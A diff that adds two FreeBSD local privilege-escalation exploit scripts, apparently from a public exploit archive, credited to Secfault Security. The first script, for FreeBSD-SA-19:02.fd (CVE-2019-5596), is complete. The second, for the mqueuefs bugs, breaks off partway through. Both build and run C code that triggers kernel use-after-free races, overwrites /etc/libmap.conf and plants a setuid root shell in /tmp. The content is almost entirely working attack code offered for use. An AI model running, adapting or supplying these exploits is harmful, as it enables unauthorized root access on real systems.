diff --git a/exploits/freebsd/local/47829.sh b/exploits/freebsd/local/47829.sh new file mode 100755 index 000000000..2db9a8699 --- /dev/null +++ b/exploits/freebsd/local/47829.sh @@ -0,0 +1,677 @@ +# Exploit: FreeBSD-SA-19:02.fd - Privilege Escalation +# Date: 2019-12-30 +# Author: Karsten König of Secfault Security +# Twitter: @gr4yf0x +# Kudos: Maik, greg and Dirk for discussion and inspiration +# CVE: CVE-2019-5596 +# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper + +#!/bin/sh + +echo "[+] Root Exploit for FreeBSD-SA-19:02.fd by Secfault Security" + +umask 0000 + +if [ ! -f /etc/libmap.conf ]; then + echo "[!] libmap.conf has to exist" + exit +fi + +cp /etc/libmap.conf ./ + +cat > heavy_cyber_weapon.c << EOF +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define N_FDS 0xfe +#define N_OPEN 0x2 + +#define N 1000000 +#define NUM_THREADS 400 +#define NUM_FORKS 3 +#define FILE_SIZE 1024 +#define CHUNK_SIZE 1 +#define N_FILES 25 + +#define SERVER_PATH "/tmp/sync_forks" +#define DEFAULT_PATH "/tmp/pwn" +#define HAMMER_PATH "/tmp/pwn2" +#define ATTACK_PATH "/etc/libmap.conf" + +#define HOOK_LIB "libutil.so.9" +#define ATTACK_LIB "/tmp/libno_ex.so.1.0" + +#define CORE_0 0 +#define CORE_1 1 + +#define MAX_TRIES 500 + +struct thread_data { + int fd; + int fd2; +}; + +pthread_mutex_t write_mtx, trigger_mtx, count_mtx, hammer_mtx; +pthread_cond_t write_cond, trigger_cond, count_cond, hammer_cond; + +int send_recv(int fd, int sv[2], int n_fds) { + int ret, i; + struct iovec iov; + struct msghdr msg; + struct cmsghdr *cmh; + char cmsg[CMSG_SPACE(sizeof(int)*n_fds)]; + int *fds; char buf[1]; + + iov.iov_base = "a"; + iov.iov_len = 1; + + msg.msg_name = NULL; + msg.msg_namelen = 0; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = cmsg; + msg.msg_controllen = CMSG_LEN(sizeof(int)*n_fds); + msg.msg_flags = 0; + + cmh = CMSG_FIRSTHDR(&msg); + cmh->cmsg_len = CMSG_LEN(sizeof(int)*n_fds); + cmh->cmsg_level = SOL_SOCKET; + cmh->cmsg_type = SCM_RIGHTS; + fds = (int *)CMSG_DATA(cmsg); + for (i = 0; i < n_fds; i++) { + fds[i] = fd; + } + + ret = sendmsg(sv[0], &msg, 0); + if (ret == -1) { + return 1; + } + + iov.iov_base = buf; + msg.msg_name = NULL; + msg.msg_namelen = 0; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = cmh; + msg.msg_controllen = CMSG_SPACE(0); + msg.msg_flags = 0; + + ret = recvmsg(sv[1], &msg, 0); + if (ret == -1) { + return 1; + } + + return 0; +} + +int open_tmp(char *path) +{ + int fd; + char *real_path; + + if (path != NULL) { + real_path = malloc(strlen(path) + 1); + strcpy(real_path, path); + } + else { + real_path = malloc(strlen(DEFAULT_PATH) + 1); + strcpy(real_path, DEFAULT_PATH); + } + + if ((fd = open(real_path, O_RDWR | O_CREAT)) == -1) { + perror("[!] open"); + exit(1); + } + + fchmod(fd, 0700); + + return fd; +} + +void prepare_domain_socket(struct sockaddr_un *remote, char *path) { + bzero(remote, sizeof(struct sockaddr_un)); + remote->sun_family = AF_UNIX; + strncpy(remote->sun_path, path, sizeof(remote->sun_path)); +} + +int bind_domain_socket(struct sockaddr_un *remote) { + int server_socket; + + if ((server_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) { + perror("[!] socket"); + exit(1); + } + + if (bind(server_socket, + (struct sockaddr *) remote, + sizeof(struct sockaddr_un)) != 0) { + perror("[!] bind"); + exit(1); + } + + return server_socket; +} + +int connect_domain_socket_client() { + int client_socket; + + if ((client_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) { + perror("[!] socket"); + exit(1); + } + + return client_socket; +} + +// Prevent panic at termination because f_count of the +// corrupted struct file is 0 at the moment this function +// is used but fd2 still points to the struct, hence fdrop() +// is called at exit and will panic because f_count will +// be below 0 +// +// So we just use our known primitive to increase f_count +void prevent_panic(int sv[2], int fd) +{ + send_recv(fd, sv, 0xfe); +} + +int stick_thread_to_core(int core) { + /* int num_cores = sysconf(_SC_NPROCESSORS_ONLN); */ + /* if (core_id < 0 || core_id >= num_cores) */ + /* return EINVAL; */ + cpuset_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(core, &cpuset); + + pthread_t current_thread = pthread_self(); + return pthread_setaffinity_np(current_thread, sizeof(cpuset_t), &cpuset); +} + +void *trigger_uaf(void *thread_args) { + struct thread_data *thread_data; + int fd, fd2; + + if (stick_thread_to_core(CORE_0) != 0) { + perror("[!] [!] trigger_uaf: Could not stick thread to core"); + } + + thread_data = (struct thread_data *)thread_args; + fd = thread_data->fd; + fd2 = thread_data->fd2; + + printf("[+] trigger_uaf: fd: %d\n", fd); + printf("[+] trigger_uaf: fd2: %d\n", fd2); + + printf("[+] trigger_uaf: Waiting for start signal from monitor\n"); + pthread_mutex_lock(&trigger_mtx); + pthread_cond_wait(&trigger_cond, &trigger_mtx); + + usleep(40); + + // Close to fds to trigger uaf + // + // This assumes that fget_write() in kern_writev() + // was already successful! + // + // Otherwise kernel panic is triggered + // + // refcount = 2 (primitive+fget_write) + close(fd); + close(fd2); + // refcount = 0 => free + fd = open(ATTACK_PATH, O_RDONLY); + // refcount = 1 + + printf("[+] trigger_uaf: Opened read-only file, now hope\n"); + printf("[+] trigger_uaf: Exit\n"); + + pthread_exit(NULL); +} + +void *hammer(void *arg) { + int i, j, k, client_socket, ret; + char buf[FILE_SIZE], sync_buf[3]; + FILE *fd[N_FILES]; + struct sockaddr_un remote; + + prepare_domain_socket(&remote, SERVER_PATH); + client_socket = connect_domain_socket_client(); + strncpy(sync_buf, "1\n", 3); + + for (i = 0; i < N_FILES; i++) { + unlink(HAMMER_PATH); + if ((fd[i] = fopen(HAMMER_PATH, "w+")) == NULL) { + perror("[!] fopen"); + exit(1); + } + } + + for (i = 0; i < FILE_SIZE; i++) { + buf[i] = 'a'; + } + + pthread_mutex_lock(&hammer_mtx); + + // Sometimes sendto() fails because + // no free buffer is available + for (;;) { + if (sendto(client_socket, + sync_buf, + strlen(sync_buf), 0, + (struct sockaddr *) &remote, + sizeof(remote)) != -1) { + break; + } + } + + pthread_cond_wait(&hammer_cond, &hammer_mtx); + pthread_mutex_unlock(&hammer_mtx); + + for (i = 0; i < N; i++) { + for (k = 0; k < N_FILES; k++) { + rewind(fd[k]); + } + for (j = 0; j < FILE_SIZE*FILE_SIZE; j += CHUNK_SIZE) { + for (k = 0; k < N_FILES; k++) { + if (fwrite(&buf[j % FILE_SIZE], sizeof(char), CHUNK_SIZE, fd[k]) < 0) { + perror("[!] fwrite"); + exit(1); + } + } + fflush(NULL); + } + } + + pthread_exit(NULL); +} + +// Works on UFS only +void *monitor_dirty_buffers(void *arg) { + int hidirtybuffers, numdirtybuffers; + size_t len; + + len = sizeof(int); + + if (sysctlbyname("vfs.hidirtybuffers", &hidirtybuffers, &len, NULL, 0) != 0) { + perror("[!] sysctlbyname hidirtybuffers"); + exit(1); + }; + printf("[+] monitor: vfs.hidirtybuffers: %d\n", hidirtybuffers); + + while(1) { + sysctlbyname("vfs.numdirtybuffers", &numdirtybuffers, &len, NULL, 0); + if (numdirtybuffers >= hidirtybuffers) { + pthread_cond_signal(&write_cond); + pthread_cond_signal(&trigger_cond); + printf("[+] monitor: Reached hidirtybuffers watermark\n"); + break; + } + } + + pthread_exit(NULL); +} + +int check_write(int fd) { + char buf[256]; + int nbytes; + struct stat st; + + printf("[+] check_write\n"); + stat(DEFAULT_PATH, &st); + printf("[+] %s size: %ld\n", DEFAULT_PATH, st.st_size); + + stat(ATTACK_PATH, &st); + printf("[+] %s size: %ld\n", ATTACK_PATH, st.st_size); + + nbytes = read(fd, buf, strlen(HOOK_LIB)); + printf("[+] Read bytes: %d\n", nbytes); + if (nbytes > 0 && strncmp(buf, HOOK_LIB, strlen(HOOK_LIB)) == 0) { + return 1; + } + else if (nbytes < 0) { + perror("[!] check_write:read"); + printf("[!] check_write:Cannot check if it worked!"); + return 1; + } + + return 0; +} + +void *write_to_file(void *thread_args) { + int fd, fd2, nbytes; + int *fd_ptr; + char buf[256]; + struct thread_data *thread_data; + + if (stick_thread_to_core(CORE_1) != 0) { + perror("[!] write_to_file: Could not stick thread to core"); + } + + fd_ptr = (int *) malloc(sizeof(int)); + + thread_data = (struct thread_data *)thread_args; + fd = thread_data->fd; + fd2 = open(ATTACK_PATH, O_RDONLY); + + printf("[+] write_to_file: Wait for signal from monitor\n"); + pthread_mutex_lock(&write_mtx); + pthread_cond_wait(&write_cond, &write_mtx); + + snprintf(buf, 256, "%s %s\n#", HOOK_LIB, ATTACK_LIB); + nbytes = write(fd, buf, strlen(buf)); + + // Reopen directly after write to prevent panic later + // + // After the write f_count == 0 because after trigger_uaf() + // opened the read-only file, f_count == 1 and write() + // calls fdrop() at the end + // + // => f_count == 0 + // + // A direct open hopefully assigns the now again free file + // object to fd so that we can prevent the panic with our + // increment primitive. + if ((fd = open_tmp(NULL)) == -1) + perror("[!] write_to_file: open_tmp"); + *fd_ptr = fd; + + if (nbytes < 0) { + perror("[!] [!] write_to_file:write"); + } else if (nbytes > 0) { + printf("[+] write_to_file: We have written something...\n"); + if (check_write(fd2) > 0) + printf("[+] write_to_file: It (probably) worked!\n"); + else + printf("[!] write_to_file: It worked not :(\n"); + } + + printf("[+] write_to_file: Exit\n"); + pthread_exit(fd_ptr); +} + +void prepare(int sv[2], int fds[2]) { + int fd, fd2, i; + + printf("[+] Start UaF preparation\n"); + printf("[+] This can take a while\n"); + + // Get a single file descriptor to send via the socket + if ((fd = open_tmp(NULL)) == -1) { + perror("[!] open_tmp"); + exit(1); + } + + if ((fd2 = dup(fd)) == -1) { + perror("[!] dup"); + exit(1); + } + + // fp->f_count will increment by 0xfe in one iteration + // doing this 16909320 times will lead to + // f_count = 16909320 * 0xfe + 2 = 0xfffffff2 + // Note the 2 because of the former call of dup() and + // the first open(). + // + // To test our trigger we can send 0xd more fd's what + // would to an f_count of 0 when fdclose() is called in + // m_dispose_extcontrolm. fdrop() will reduce f_count to + // 0xffffffff = -1 and ultimately panic when _fdrop() is + // called because the latter asserts that f_count is 0. + // _fdrop is called in the first place because + // refcount_release() only checks that f_count is less or + // equal 1 to recognize the last reference. + // + // If we want to trigger the free without panic, we have + // to send 0xf fds and close an own what will lead to an + // fdrop() call without panic as f_count is 1 and reduced + // to 0 by close(). The unclosed descriptor references now + // a free 'struct file'. + for (i = 0; i < 16909320; i++) { + if (i % 1690930 == 0) { + printf("[+] Progress: %d%%\n", (u_int32_t) (i / 169093)); + } + + if (send_recv(fd, sv, N_FDS)) { + perror("[!] prepare:send_recv"); + exit(1); + } + } + if (send_recv(fd, sv, 0xf)) { + perror("[!] prepare:send_recv"); + exit(1); + } + + fds[0] = fd; + fds[1] = fd2; + + printf("[+] Finished UaF preparation\n"); +} + +void read_thread_status(int server_socket) { + int bytes_rec, count; + struct sockaddr_un client; + socklen_t len; + char buf[256]; + struct timeval tv; + + tv.tv_sec = 10; + tv.tv_usec = 0; + setsockopt(server_socket, + SOL_SOCKET, SO_RCVTIMEO, + (const char*)&tv, sizeof tv); + + for (count = 0; count < NUM_FORKS*NUM_THREADS; count++) { + if (count % 100 == 0) { + printf("[+] Hammer threads ready: %d\n", count); + } + bzero(&client, sizeof(struct sockaddr_un)); + bzero(buf, 256); + + len = sizeof(struct sockaddr_un); + if ((bytes_rec = recvfrom(server_socket, + buf, 256, 0, + (struct sockaddr *) &client, + &len)) == -1) { + perror("[!] recvfrom"); + break; + } + } + + if (count != NUM_FORKS * NUM_THREADS) { + printf("[!] Could not create all hammer threads, will try though!\n"); + } +} + +void fire() { + int i, j, fd, fd2, bytes_rec, server_socket; + int sv[2], fds[2], hammer_socket[NUM_FORKS]; + int *fd_ptr; + char socket_path[256], sync_buf[3], buf[256]; + pthread_t write_thread, trigger_thread, monitor_thread; + pthread_t hammer_threads[NUM_THREADS]; + pid_t pids[NUM_FORKS]; + socklen_t len; + struct thread_data thread_data; + struct sockaddr_un server, client; + struct sockaddr_un hammer_socket_addr[NUM_FORKS]; + + // Socket for receiving thread status + unlink(SERVER_PATH); + prepare_domain_socket(&server, SERVER_PATH); + server_socket = bind_domain_socket(&server); + + // Sockets to receive hammer signal + for (i = 0; i < NUM_FORKS; i++) { + snprintf(socket_path, sizeof(socket_path), "%s%c", SERVER_PATH, '1'+i); + unlink(socket_path); + prepare_domain_socket(&hammer_socket_addr[i], socket_path); + hammer_socket[i] = bind_domain_socket(&hammer_socket_addr[i]); + } + + strncpy(sync_buf, "1\n", 3); + len = sizeof(struct sockaddr_un); + + if (socketpair(PF_UNIX, SOCK_STREAM, 0, sv) == -1) { + perror("[!] socketpair"); + exit(1); + } + + pthread_mutex_init(&write_mtx, NULL); + pthread_mutex_init(&trigger_mtx, NULL); + pthread_cond_init(&write_cond, NULL); + pthread_cond_init(&trigger_cond, NULL); + + pthread_create(&monitor_thread, NULL, monitor_dirty_buffers, NULL); + + prepare(sv, fds); + fd = fds[0]; + fd2 = fds[1]; + + thread_data.fd = fd; + thread_data.fd2 = fd2; + pthread_create(&trigger_thread, NULL, trigger_uaf, (void *) &thread_data); + pthread_create(&write_thread, NULL, write_to_file, (void *) &thread_data); + + for (j = 0; j < NUM_FORKS; j++) { + if ((pids[j] = fork()) < 0) { + perror("[!] fork"); + abort(); + } + else if (pids[j] == 0) { + pthread_mutex_init(&hammer_mtx, NULL); + pthread_cond_init(&hammer_cond, NULL); + + close(fd); + close(fd2); + + /* Prevent that a file stream in the hammer threads + * gets the file descriptor of fd for debugging purposes + */ + if ((fd = open_tmp("/tmp/dummy")) == -1) + perror("[!] dummy"); + if ((fd2 = open_tmp("/tmp/dummy2")) == -1) + perror("[!] dummy2"); + printf("[+] Fork %d fd: %d\n", j, fd); + printf("[+] Fork %d fd2: %d\n", j, fd2); + + for (i = 0; i < NUM_THREADS; i++) { + pthread_create(&hammer_threads[i], NULL, hammer, NULL); + } + + printf("[+] Fork %d created all threads\n", j); + + if ((bytes_rec = recvfrom(hammer_socket[j], + buf, 256, 0, + (struct sockaddr *) &client, + &len)) == -1) { + perror("[!] accept"); + abort(); + } + + pthread_cond_broadcast(&hammer_cond); + + for (i = 0; i < NUM_THREADS; i++) { + pthread_join(hammer_threads[i], NULL); + } + + pthread_cond_destroy(&hammer_cond); + pthread_mutex_destroy(&hammer_mtx); + + exit(0); + } else { + printf("[+] Created child with PID %d\n", pids[j]); + } + } + + read_thread_status(server_socket); + printf("[+] Send signal to Start Hammering\n"); + for (i = 0; i < NUM_FORKS; i++) { + if (sendto(hammer_socket[i], + sync_buf, + strlen(sync_buf), 0, + (struct sockaddr *) &hammer_socket_addr[i], + sizeof(hammer_socket_addr[0])) == -1) { + perror("[!] sendto"); + exit(1); + } + } + + pthread_join(monitor_thread, NULL); + for (i = 0; i < NUM_FORKS; i++) { + kill(pids[i], SIGKILL); + printf("[+] Killed %d\n", pids[i]); + } + + pthread_join(write_thread, (void **) &fd_ptr); + pthread_join(trigger_thread, NULL); + + pthread_mutex_destroy(&write_mtx); + pthread_mutex_destroy(&trigger_mtx); + pthread_cond_destroy(&write_cond); + pthread_cond_destroy(&trigger_cond); + + printf("[+] Returned fd: %d\n", *fd_ptr); + prevent_panic(sv, *fd_ptr); + + // fd was acquired from write_to_file + // which allocs a pointer for it + free(fd_ptr); +} + +int main(int argc, char **argv) +{ + setbuf(stdout, NULL); + + fire(); + + return 0; +} + +EOF + +cc -o heavy_cyber_weapon -lpthread heavy_cyber_weapon.c + +cat > program.c << EOF +#include +#include +#include +#include + +void _init() +{ + if (!geteuid()) + execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL); +} + +EOF + +cc -o program.o -c program.c -fPIC +cc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles +cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0 + +echo "[+] Firing the Heavy Cyber Weapon" +./heavy_cyber_weapon +su + +if [ -f /tmp/xxxx ]; then + echo "[+] Enjoy!" + echo "[+] Do not forget to copy ./libmap.conf back to /etc/libmap.conf" + /tmp/xxxx +else + echo "[!] FAIL" +fi \ No newline at end of file diff --git a/exploits/freebsd/local/47830.sh b/exploits/freebsd/local/47830.sh new file mode 100755 index 000000000..98d9761e6 --- /dev/null +++ b/exploits/freebsd/local/47830.sh @@ -0,0 +1,754 @@ +# Exploit: FreeBSD-SA-19:15.mqueuefs - Privilege Escalation +# Author: Karsten König of Secfault Security +# Date: 2019-12-30 +# Change line 719 to choose which vulnerability +# is targeted +# +# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper +# Exploit for FreeBSD-SA-19:15.mqueuefs and +# FreeBSD-SA-19:24.mqueu +#!/bin/sh + +echo "[+] Root Exploit for FreeBSD mqueuefs vulnerabilities" + +umask 0000 + +# libmap.conf has to exist because it is +# the attacked file +if [ ! -f /etc/libmap.conf ]; then + echo "[!] libmap.conf has to exist" + exit +fi + +# Make a backup of the current libmap.conf +# because it has to be reconstructed afterwards +cp /etc/libmap.conf ./ + +# Write the exploit to a C file +cat > exploit.c << EOF +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define N_OPEN 0x2 + +// Tweak NUM_THREADS and NUM_FORKS if +// more RAM is available on the target +// +// These parameters were tested with +// up to 16 GB of RAM on a dual-core +// Intel based system +#define N 1000000 +#define NUM_THREADS 600 +#define NUM_FORKS 3 +#define FILE_SIZE 1024 +#define CHUNK_SIZE 1 +#define N_FILES 25 + +// These are temporary files +// which are created during +// exploitation +#define SERVER_PATH "/tmp/sync_forks" +#define DEFAULT_PATH "/tmp/pwn" +#define HAMMER_PATH "/tmp/pwn2" + +// This is the attacked file +#define ATTACK_PATH "/etc/libmap.conf" + +// These are parameters from the attack script +#define HOOK_LIB "libutil.so.9" +#define ATTACK_LIB "/tmp/libno_ex.so.1.0" + +// The exploit will stick some threads +// to specific cores +#define CORE_0 0 +#define CORE_1 1 + +// Syscalls from mqueuefs +#define KMQ_OPEN 457 +#define KMQ_TIMEDSEND 460 + +// Taken from sys/mqueue.h +struct mq_attr { + long mq_flags; + long mq_maxmsg; + long mq_msgsize; + long mq_curmsgs; + long __reserved[4]; +}; + +struct thread_data { + int fd; + int fd2; +}; + +pthread_mutex_t write_mtx, trigger_mtx, count_mtx, hammer_mtx; +pthread_cond_t write_cond, trigger_cond, count_cond, hammer_cond; + +// Both syscalls are indirectly called to be less reliable on +// installed libraries +int mq_open(const char *name, int oflag, mode_t mode, + const struct mq_attr *attr) +{ + int fd; + fd = syscall(KMQ_OPEN, name, oflag, mode, attr); + return fd; +} + +void mq_timedsend(int fd, char *buf, size_t len, + unsigned prio, const struct timespec *timeout) +{ + syscall(KMQ_TIMEDSEND, fd, buf, len, prio, timeout); +} + +// Convenience function to open temporary files +int open_tmp(char *path) +{ + int fd; + char *real_path; + + if (path != NULL) { + real_path = malloc(strlen(path) + 1); + strcpy(real_path, path); + } + else { + real_path = malloc(strlen(DEFAULT_PATH) + 1); + strcpy(real_path, DEFAULT_PATH); + } + + if ((fd = open(real_path, O_RDWR | O_CREAT, S_IRWXU)) == -1) { + perror("[!] open"); + } + + return fd; +} + +// Convenience function to prepare a UNIX domain socket +void prepare_domain_socket(struct sockaddr_un *remote, char *path) { + bzero(remote, sizeof(struct sockaddr_un)); + remote->sun_family = AF_UNIX; + strncpy(remote->sun_path, path, sizeof(remote->sun_path)); +} + +// Convenience function to bind a UNIX domain socket +int bind_domain_socket(struct sockaddr_un *remote) { + int server_socket; + + if ((server_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) { + perror("[!] socket"); + exit(1); + } + + if (bind(server_socket, + (struct sockaddr *) remote, + sizeof(struct sockaddr_un)) != 0) { + perror("[!] bind"); + exit(1); + } + + return server_socket; +} + +// Convenience function to connect to a UNIX domain socket +int connect_domain_socket_client() { + int client_socket; + + if ((client_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) { + perror("[!] socket"); + exit(1); + } + + return client_socket; +} + +// Prevent panic at termination because f_count of the +// corrupted struct file is 0 at the moment this function +// is called but open file descriptors still points to the struct, +// hence fdrop() is called at exit of the program and will raise a +// kernel panic because f_count will be below 0 +// +// So we just use our known primitive to increase f_count +void prevent_panic(int fd) +{ + mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1); + mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1); + mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1); +} + +// Convenience function to stick a thread to a CPU core +int stick_thread_to_core(int core) { + cpuset_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(core, &cpuset); + + pthread_t current_thread = pthread_self(); + return pthread_setaffinity_np(current_thread, sizeof(cpuset_t), &cpuset); +} + +// This function will trigger the use-after-free +void *trigger_uaf(void *thread_args) { + struct thread_data *thread_data; + int fd, fd2; + + if (stick_thread_to_core(CORE_0) != 0) { + perror("[!] [!] trigger_uaf: Could not stick thread to core"); + } + + thread_data = (struct thread_data *)thread_args; + fd = thread_data->fd; + fd2 = thread_data->fd2; + + printf("[+] trigger_uaf: fd: %d\n", fd); + printf("[+] trigger_uaf: fd2: %d\n", fd2); + + // The thread has to wait for the preparation of the + // race condition + printf("[+] trigger_uaf: Waiting for start signal from monitor\n"); + pthread_mutex_lock(&trigger_mtx); + pthread_cond_wait(&trigger_cond, &trigger_mtx); + + // This sleep parameter helps to render + // the exploit more reliable + // + // Tweeking may be needed for the target system + usleep(40); + + // Close two fds to trigger UaF + // + // This assumes that fget_write() in kern_writev() + // was already successful! + // + // Otherwise kernel panic is triggered + // + // f_count = 2 (primitive+fget_write) + close(fd); + close(fd2); + // f_count = 0 => free + fd = open(ATTACK_PATH, O_RDONLY); + // refcount = 1 + // all fds do now point to the attacked path + + printf("[+] trigger_uaf: Opened read-only file\n"); + printf("[+] trigger_uaf: Exit\n"); + + pthread_exit(NULL); +} + +// This function will write to many invalid file streams +// +// This will eventually increase the number of dirty buffers +// in the kernel and creates an exploitable race condition +// for the Use-after-Free +void *hammer(void *arg) { + int i, j, k, client_socket; + char buf[FILE_SIZE], sync_buf[3]; + FILE *fd[N_FILES]; + struct sockaddr_un remote; + + prepare_domain_socket(&remote, SERVER_PATH); + client_socket = connect_domain_socket_client(); + strncpy(sync_buf, "1\n", 3); + + // Open many files and unlink them directly + // to render the file stream invalid + for (i = 0; i < N_FILES; i++) { + unlink(HAMMER_PATH); + if ((fd[i] = fopen(HAMMER_PATH, "w+")) == NULL) { + perror("[!] fopen"); + exit(1); + } + } + + for (i = 0; i < FILE_SIZE; i++) { + buf[i] = 'a'; + } + + pthread_mutex_lock(&hammer_mtx); + + // Signal that the thread is prepared + // + // Sometimes sendto() fails because + // no free buffer is available + for (;;) { + if (sendto(client_socket, + sync_buf, + strlen(sync_buf), 0, + (struct sockaddr *) &remote, + sizeof(remote)) != -1) { + break; + } + } + + // Wait for the other hammer threads + pthread_cond_wait(&hammer_cond, &hammer_mtx); + pthread_mutex_unlock(&hammer_mtx); + + // Write to the file streams to create many dirty buffers + for (i = 0; i < N; i++) { + for (k = 0; k < N_FILES; k++) { + rewind(fd[k]); + } + for (j = 0; j < FILE_SIZE*FILE_SIZE; j += CHUNK_SIZE) { + for (k = 0; k < N_FILES; k++) { + if (fwrite(&buf[j % FILE_SIZE], sizeof(char), CHUNK_SIZE, fd[k]) < 0) { + perror("[!] fwrite"); + exit(1); + } + } + fflush(NULL); + } + } + + pthread_exit(NULL); +} + +// This function monitors the number of +// dirty buffers. +// +// If enough dirty buffers do exist, a +// signal to the write and Use-after-Free +// trigger thread is signalled to +// execute the actual attack +// +// Works on UFS only +void *monitor_dirty_buffers(void *arg) { + int hidirtybuffers, numdirtybuffers; + size_t len; + + len = sizeof(int); + + if (sysctlbyname("vfs.hidirtybuffers", &hidirtybuffers, &len, NULL, 0) != 0) { + perror("[!] sysctlbyname hidirtybuffers"); + exit(1); + }; + printf("[+] monitor: vfs.hidirtybuffers: %d\n", hidirtybuffers); + + while(1) { + sysctlbyname("vfs.numdirtybuffers", &numdirtybuffers, &len, NULL, 0); + if (numdirtybuffers >= hidirtybuffers) { + pthread_cond_signal(&write_cond); + pthread_cond_signal(&trigger_cond); + printf("[+] monitor: Reached hidirtybuffers watermark\n"); + break; + } + } + + pthread_exit(NULL); +} + +// Check if the write to the attacked +// path was successful +int check_write(int fd) { + char buf[256]; + int nbytes; + struct stat st; + + printf("[+] check_write\n"); + stat(DEFAULT_PATH, &st); + printf("[+] %s size: %lld\n", DEFAULT_PATH, st.st_size); + + stat(ATTACK_PATH, &st); + printf("[+] %s size: %lld\n", ATTACK_PATH, st.st_size); + + nbytes = read(fd, buf, strlen(HOOK_LIB)); + printf("[+] Read bytes: %d\n", nbytes); + if (nbytes > 0 && strncmp(buf, HOOK_LIB, strlen(HOOK_LIB)) == 0) { + return 1; + } + else if (nbytes < 0) { + perror("[!] check_write:read"); + printf("[!] check_write:Cannot check if it worked!"); + return 1; + } + + return 0; +} + +// This function will execute the write operation +// to the attacked path +void *write_to_file(void *thread_args) { + int fd, fd2, nbytes; + int *fd_ptr; + char buf[256]; + struct thread_data *thread_data; + struct mq_attr attrs; + + if (stick_thread_to_core(CORE_1) != 0) { + perror("[!] write_to_file: Could not stick thread to core"); + } + + fd_ptr = malloc(sizeof(int)); + + attrs.mq_maxmsg = 10; + attrs.mq_msgsize = sizeof(int); + + thread_data = (struct thread_data *)thread_args; + fd = thread_data->fd; + fd2 = open(ATTACK_PATH, O_RDONLY); + + // Wait for the signal to execute the write operation + printf("[+] write_to_file: Wait for signal from monitor\n"); + pthread_mutex_lock(&write_mtx); + pthread_cond_wait(&write_cond, &write_mtx); + + // Write to the temporary file + // + // During the write operation the exploit will trigger + // the Use-after-Free and exchange the written file + // with the attacked file to render a write to it + snprintf(buf, 256, "%s %s\n#", HOOK_LIB, ATTACK_LIB); + nbytes = write(fd, buf, strlen(buf)); + + // Reopen directly after write to prevent panic later + // + // After the write f_count == 0 because after trigger_uaf() + // opened the read-only file, f_count == 1 and write() + // calls fdrop() at the end + // + // => f_count == 0 + // + // A direct open hopefully assigns the now again free file + // object to fd so that we can prevent the panic with our + // increment primitive. + *fd_ptr = mq_open("/pwn_mq", O_RDWR | O_CREAT, 0666, &attrs); + if (*fd_ptr == -1) + perror("[!] write_to_file: mq_open"); + + if (nbytes < 0) { + perror("[!] write_to_file: write"); + } else if (nbytes > 0) { + printf("[+] write_to_file: We have written something...\n"); + if (check_write(fd2) > 0) + printf("[+] write_to_file: It (probably) worked!\n"); + else + printf("[!] write_to_file: It worked not :(\n"); + } + + printf("[+] write_to_file: Exit\n"); + pthread_exit(fd_ptr); +} + +// This function prepares the Use-after-Free due to +// a reference counter overflow +void prepare(int fds[3]) { + int fd, fd2, fd3, trigger_fd; + u_int32_t i; + struct mq_attr attrs; + attrs.mq_maxmsg = 10; + attrs.mq_msgsize = sizeof(int); + + printf("[+] Start UaF preparation\n"); + printf("[+] This can take a while\n"); + + // Open a mqueue file + fd = mq_open("/pwn_mq", O_RDWR | O_CREAT, 0666, &attrs); + if (fd == -1) { + perror("open"); + exit(1); + } + + // fp->f_count will be incremented by 1 per iteration due + // to the bug in freebsd32_kmq_timedsend() + // + // That is, 0xfffffffe iterations will increment it to + // 0xffffffff (f_count starts with 1 because of mq_open()) + // + // The bug is triggered because freebsd_kqm_timedsend will eventually + // try to call copyin() with the pointer to address 0x1 which + // is invalid + for (i = 0; i < 0xfffffffe; i++) { + // just a progress message, nothing special about the magic values + if (i % 0x19999990 == 0) + printf("[+] Progress: %d%%\n", (u_int32_t) (i / 0x28f5c28)); + mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1); + } + + // Every dup() increases fp->f_count by 1 + // + // Using dup() works because FreeBSD's mqueue implementation + // is implemented by using file objects (struct file) internally. + // + // This circumvents an infinite loop in fget_unlocked() as dup() + // does not use _fget() but fhold() to increase the counter. + fd2 = dup(fd); + if (fd2 == -1) { + perror("dup"); + exit(1); + } + fd3 = dup(fd); + if (fd3 == -1) { + perror("dup"); + exit(1); + } + + // Close the mqueue file to trigger a free operation + // + // The descriptors fd2 and fd3 will still point + // to the freed object + // + // Opening another file will render these descriptors + // to point the newly opened file + close(fd); + trigger_fd = open_tmp(NULL); + + fds[0] = trigger_fd; + fds[1] = fd2; + fds[2] = fd3; + + printf("[+] Finished UaF preparation\n"); +} + +// This function will monitor that all +// hammer threads are opened +void read_thread_status(int server_socket) { + int bytes_rec, count; + struct sockaddr_un client; + socklen_t len; + char buf[256]; + struct timeval tv; + + tv.tv_sec = 10; + tv.tv_usec = 0; + setsockopt(server_socket, + SOL_SOCKET, SO_RCVTIMEO, + (const char*)&tv, sizeof tv); + + for (count = 0; count < NUM_FORKS*NUM_THREADS; count++) { + if (count % 100 == 0) { + printf("[+] Hammer threads ready: %d\n", count); + } + bzero(&client, sizeof(struct sockaddr_un)); + bzero(buf, 256); + + len = sizeof(struct sockaddr_un); + if ((bytes_rec = recvfrom(server_socket, + buf, 256, 0, + (struct sockaddr *) &client, + &len)) == -1) { + perror("[!] recvfrom"); + break; + } + } + + if (count != NUM_FORKS * NUM_THREADS) { + printf("[!] Could not create all hammer threads, will try though!\n"); + } +} + +// This function will execute the whole exploit +void fire() { + int i, j, fd, fd2, fd3, 